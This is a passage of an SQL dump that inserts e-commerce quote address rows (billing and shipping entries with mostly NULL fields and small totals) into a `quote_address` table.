(1611, 989, '2026-04-11 04:17:02', '2026-04-11 04:17:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1612, 989, '2026-04-11 04:17:02', '2026-04-11 04:17:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1613, 990, '2026-04-11 04:17:19', '2026-04-11 04:17:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1614, 990, '2026-04-11 04:17:19', '2026-04-11 04:17:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1615, 991, '2026-04-11 04:17:23', '2026-04-11 04:17:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1616, 991, '2026-04-11 04:17:23', '2026-04-11 04:17:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1617, 992, '2026-04-11 04:17:39', '2026-04-11 04:17:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1618, 992, '2026-04-11 04:17:39', '2026-04-11 04:17:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1619, 993, '2026-04-11 04:56:27', '2026-04-11 04:56:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1620, 993, '2026-04-11 04:56:27', '2026-04-11 04:56:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1621, 994, '2026-04-11 06:17:32', '2026-04-11 06:17:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1622, 994, '2026-04-11 06:17:32', '2026-04-11 06:17:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1623, 995, '2026-04-11 14:10:33', '2026-04-11 14:10:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1624, 995, '2026-04-11 14:10:33', '2026-04-11 14:10:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1625, 996, '2026-04-11 16:10:08', '2026-04-11 16:10:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1626, 996, '2026-04-11 16:10:08', '2026-04-11 16:10:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1627, 997, '2026-04-11 22:16:36', '2026-04-11 22:16:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1628, 997, '2026-04-11 22:16:36', '2026-04-11 22:16:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1629, 998, '2026-04-12 01:15:57', '2026-04-12 01:15:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1630, 998, '2026-04-12 01:15:57', '2026-04-12 01:15:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1631, 999, '2026-04-12 06:20:19', '2026-04-12 06:20:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1632, 999, '2026-04-12 06:20:19', '2026-04-12 06:20:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1633, 1000, '2026-04-12 10:24:33', '2026-04-12 10:24:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1634, 1000, '2026-04-12 10:24:33', '2026-04-12 10:24:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1635, 1001, '2026-04-12 12:31:22', '2026-04-12 12:31:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1636, 1001, '2026-04-12 12:31:22', '2026-04-12 12:31:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1637, 1002, '2026-04-12 14:28:31', '2026-04-12 14:28:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1638, 1002, '2026-04-12 14:28:31', '2026-04-12 14:28:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1639, 1003, '2026-04-12 16:02:35', '2026-04-12 16:02:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1640, 1003, '2026-04-12 16:02:35', '2026-04-12 16:02:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1641, 1004, '2026-04-12 16:02:43', '2026-04-12 16:02:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1642, 1004, '2026-04-12 16:02:43', '2026-04-12 16:02:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1643, 1005, '2026-04-12 16:02:44', '2026-04-12 16:02:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1644, 1005, '2026-04-12 16:02:44', '2026-04-12 16:02:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1645, 1006, '2026-04-12 16:02:44', '2026-04-12 16:02:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1646, 1006, '2026-04-12 16:02:44', '2026-04-12 16:02:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1647, 1007, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1648, 1007, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1649, 1008, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1650, 1008, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1651, 1009, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1652, 1009, '2026-04-12 16:02:45', '2026-04-12 16:02:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1653, 1010, '2026-04-12 16:02:46', '2026-04-12 16:02:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1654, 1010, '2026-04-12 16:02:46', '2026-04-12 16:02:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
